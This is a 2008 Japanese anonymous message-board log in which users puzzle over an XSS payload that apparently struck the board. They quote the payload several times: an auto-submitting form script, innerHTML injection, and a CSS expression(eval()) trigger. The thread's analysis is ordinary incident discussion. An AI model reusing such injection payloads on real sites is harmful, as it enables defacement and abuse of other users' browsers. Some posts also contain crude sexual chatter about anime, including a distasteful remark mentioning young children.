下へ
2008/09/27 (土) 05:51:23        [qwerty]
今日は寒いね(´ー`;)

>  2008/09/27 (土) 05:51:21        [qwerty]
> > 寝ます。(;´ω`)
> 漏れが来たとたんに固定二人が寝る宣言(;´Д`)いじめ!?

むしろさっさといなくなって欲しい連中ばかりだろ(;´Д`)

参考:2008/09/27(土)05時42分55秒

>  2008/09/27 (土) 05:51:01        [qwerty]
> > eval
> それはわかるがSubmitが2行目で実行されてるからvに対して数値が入って投稿されるそのコード
> 自体がその下にあるEvalで実行される理由がわからん・・・
> とにかく寝て起きたらテストしてみよう(;´Д`)もう駄目眠い

submitを含むJavascriptのコードはhiddenなフィールドのvalueに単なる文字列として設定されるだけ
evalでそのフィールドに書かれているjavascriptを実行させている

参考:2008/09/27(土)05時48分03秒

>  2008/09/27 (土) 05:50:27        [qwerty]
> 半袖短パンでお外出たら寒かったんだけど(;´Д`)

そろそろエアコンをとめようかな(;´Д`)

参考:2008/09/27(土)05時50分00秒

2008/09/27 (土) 05:50:00        [qwerty]
半袖短パンでお外出たら寒かったんだけど(;´Д`)

>  投稿者:えじじ! 2008/09/27 (土) 05:48:47        [qwerty]
> > えっ、しないの?(;´ω`)
> ショタは嫌いじゃないけどこれは淡泊すぎるな(;´Д`)
> こう公園で幼稚園児がきゃーきゃーいって普通に遊んで戯れてる位の印象で
> まったく性とかを感じられない

ピコの1を流そうかと思ったがもう眠いな。(;´ω`)アレは最後もう上連雀の世界だったけど

参考:2008/09/27(土)05時47分06秒

>  2008/09/27 (土) 05:48:03        [qwerty]
> > これは推測だけど、投稿文字列が数字だけだったことを考えると、
> > 実際コードとして機能してるのって
> > mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> > mm.document.forms[0].submit();
> > だけだと思う。submit()走っちゃってるからページ遷移がおこっちゃうので下のコードは
> > ただのゴミなんじゃないかしらん。
> > でもさすがにエスケープ対策してるから、いったいこのJSがどこで走ってたのかが気になる。
> eval

それはわかるがSubmitが2行目で実行されてるからvに対して数値が入って投稿されるそのコード
自体がその下にあるEvalで実行される理由がわからん・・・
とにかく寝て起きたらテストしてみよう(;´Д`)もう駄目眠い

参考:2008/09/27(土)05時42分53秒

>えじじ! 2008/09/27 (土) 05:47:06        [qwerty]
> > ところでヤクザはこれで射精するの?(;´Д`)
> えっ、しないの?(;´ω`)

ショタは嫌いじゃないけどこれは淡泊すぎるな(;´Д`)
こう公園で幼稚園児がきゃーきゃーいって普通に遊んで戯れてる位の印象で
まったく性とかを感じられない

参考:2008/09/27(土)05時45分58秒

>  投稿者:えじじ! 2008/09/27 (土) 05:46:37        [qwerty]
> えここ終わった?(;´Д`)

寝ます。(;´ω`)PCはつけっぱなしだからなんか垂れ流すのは可能だが

参考:2008/09/27(土)05時45分56秒

>  投稿者:えじじ! 2008/09/27 (土) 05:45:58        [qwerty]
> > 今日のログを。(;´ω`)
> > 眠い
> ところでヤクザはこれで射精するの?(;´Д`)

えっ、しないの?(;´ω`)

参考:2008/09/27(土)05時45分04秒

2008/09/27 (土) 05:45:56        [qwerty]
えここ終わった?(;´Д`)

>  2008/09/27 (土) 05:45:29        [qwerty]
> > 表示件数が30だったらフニャフニャやって123件にする、ところの存在意味が
> > 分からないのでどなたか説明キボリ(;´Д`)
> これは推測だけど、投稿文字列が数字だけだったことを考えると、
> 実際コードとして機能してるのって
> mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> mm.document.forms[0].submit();
> だけだと思う。submit()走っちゃってるからページ遷移がおこっちゃうので下のコードは
> ただのゴミなんじゃないかしらん。
> でもさすがにエスケープ対策してるから、いったいこのJSがどこで走ってたのかが気になる。

その辺のコードはinnerHTML=で代入される
実行部分はstyle={...}

参考:2008/09/27(土)05時38分08秒

>えじじ! 2008/09/27 (土) 05:45:04        [qwerty]
> > 漏れが来たとたんに固定二人が寝る宣言(;´Д`)いじめ!?
> 今日のログを。(;´ω`)
> 眠い

ところでヤクザはこれで射精するの?(;´Д`)

参考:2008/09/27(土)05時44分12秒

>  投稿者:えじじ! 2008/09/27 (土) 05:44:12        [qwerty]
> > 寝ます。(;´ω`)
> 漏れが来たとたんに固定二人が寝る宣言(;´Д`)いじめ!?

今日のログを。(;´ω`)
眠い

参考:2008/09/27(土)05時42分55秒

>えじじ! 2008/09/27 (土) 05:42:55        [qwerty]
> 寝ます。(;´ω`)

漏れが来たとたんに固定二人が寝る宣言(;´Д`)いじめ!?

参考:2008/09/27(土)05時41分56秒

>  2008/09/27 (土) 05:42:53        [qwerty]
> > 表示件数が30だったらフニャフニャやって123件にする、ところの存在意味が
> > 分からないのでどなたか説明キボリ(;´Д`)
> これは推測だけど、投稿文字列が数字だけだったことを考えると、
> 実際コードとして機能してるのって
> mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> mm.document.forms[0].submit();
> だけだと思う。submit()走っちゃってるからページ遷移がおこっちゃうので下のコードは
> ただのゴミなんじゃないかしらん。
> でもさすがにエスケープ対策してるから、いったいこのJSがどこで走ってたのかが気になる。

eval

参考:2008/09/27(土)05時38分08秒

>えじじ! 2008/09/27 (土) 05:42:24        [qwerty]
> 寝ます。(;´ω`)

一日中エロアニメ転送でもするのかと思った(;´Д`)

参考:2008/09/27(土)05時41分56秒

投稿者:えじじ! 2008/09/27 (土) 05:41:56        [qwerty]
寝ます。(;´ω`)

>  2008/09/27 (土) 05:38:08        [qwerty]
> > mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> > mm.document.forms[0].submit();
> > name=mmm+src=http://qwerty.on.arena.ne.jp
> > /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
> > l=String.fromCharCode(60);
> > r=String.fromCharCode(62);
> > ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
> > u.value+r;
> > document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
> > }
> 表示件数が30だったらフニャフニャやって123件にする、ところの存在意味が
> 分からないのでどなたか説明キボリ(;´Д`)

これは推測だけど、投稿文字列が数字だけだったことを考えると、
実際コードとして機能してるのって

mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
mm.document.forms[0].submit();

だけだと思う。submit()走っちゃってるからページ遷移がおこっちゃうので下のコードは
ただのゴミなんじゃないかしらん。
でもさすがにエスケープ対策してるから、いったいこのJSがどこで走ってたのかが気になる。

参考:2008/09/27(土)05時32分48秒

>  2008/09/27 (土) 05:37:58        [qwerty]
> えここのエロアニメが紙芝居だよ(;´Д`)

うちはそうでもないな(;´Д`)しょぼいAtomと1GBメモリだけど

参考:2008/09/27(土)05時36分42秒

2008/09/27 (土) 05:37:51        [qwerty]
なんだよホモアニメじゃねえか

2008/09/27 (土) 05:37:21        [qwerty]
あーやっとわかった(;´Д`)
 "http://(略)/bbs.cgi&渡したい物"
って事かぁ
普通の構文じゃないデスかぁー

2008/09/27 (土) 05:36:42        [qwerty]
えここのエロアニメが紙芝居だよ(;´Д`)

2008/09/27 (土) 05:36:07        [qwerty]
寝るか(;´Д`)シミ

2008/09/27 (土) 05:34:57        [qwerty]
こんな時間なのに38人もいるぜ

2008/09/27 (土) 05:34:55        [qwerty]
生き残りたい(;´Д`)生き残りたい

>  2008/09/27 (土) 05:34:19        [qwerty]
> 訴えた内容だけ見ると馬鹿かと思うけど講師の授業内容見てると多少は同情する面もあるな(;´Д`)
> http://www.yomiuri.co.jp/e-japan/miyagi/news/20080925-OYT8T00083.htm

個人指導はどうしようもないよね(;´Д`)個人差がありすぎる

参考:2008/09/27(土)05時32分34秒

2008/09/27 (土) 05:34:19        [qwerty]
はぁ(;´Д`)Shintani

>  2008/09/27 (土) 05:33:40        [qwerty]
> > つまりコードをGETで渡されてうかつにも実行しちゃったって事?
> tだとするならばXSS攻撃ってことになる上に、誰かが掲示板ろリロードするたびに
> 数字がでてたことになるね。
> でもコードが嫌に不完全なんだよね・・・ ocumentとか。

オキュメントって物があるのかもしれない!

参考:2008/09/27(土)05時32分16秒

>  2008/09/27 (土) 05:33:32        [qwerty]
> > つまりコードをGETで渡されてうかつにも実行しちゃったって事?
> tだとするならばXSS攻撃ってことになる上に、誰かが掲示板ろリロードするたびに
> 数字がでてたことになるね。
> でもコードが嫌に不完全なんだよね・・・ ocumentとか。

それは俺が加工する際に消しちゃっただけだよ(;´Д`)

参考:2008/09/27(土)05時32分16秒

>  2008/09/27 (土) 05:32:48        [qwerty]
> > えー(;´Д`)じゃあヒンヨ : %3d は "="、
> mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> mm.document.forms[0].submit();
> name=mmm+src=http://qwerty.on.arena.ne.jp
> /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
> l=String.fromCharCode(60);
> r=String.fromCharCode(62);
> ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
> u.value+r;
> document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
> }

表示件数が30だったらフニャフニャやって123件にする、ところの存在意味が
分からないのでどなたか説明キボリ(;´Д`)

参考:2008/09/27(土)05時22分23秒

2008/09/27 (土) 05:32:34        [qwerty]
訴えた内容だけ見ると馬鹿かと思うけど講師の授業内容見てると多少は同情する面もあるな(;´Д`)
http://www.yomiuri.co.jp/e-japan/miyagi/news/20080925-OYT8T00083.htm

>  2008/09/27 (土) 05:32:16        [qwerty]
> > mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> > mm.document.forms[0].submit();
> > name=mmm+src=http://qwerty.on.arena.ne.jp
> > /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
> > l=String.fromCharCode(60);
> > r=String.fromCharCode(62);
> > ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
> > u.value+r;
> > document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
> > }
> つまりコードをGETで渡されてうかつにも実行しちゃったって事?

tだとするならばXSS攻撃ってことになる上に、誰かが掲示板ろリロードするたびに
数字がでてたことになるね。
でもコードが嫌に不完全なんだよね・・・ ocumentとか。

参考:2008/09/27(土)05時26分58秒

>a 2008/09/27 (土) 05:31:57        [qwerty]
> > 俺も前まで勘違いしてたんだが
> > くずははCookie使ってないんだわ
> > ただ投稿時の名前を保持してるだけ
> まじで(;´Д`)

その状態でjavascript:alert(document.cookie);
ってアドレスバーに入れてエンター押せば解りやすい

参考:2008/09/27(土)05時29分05秒

上へ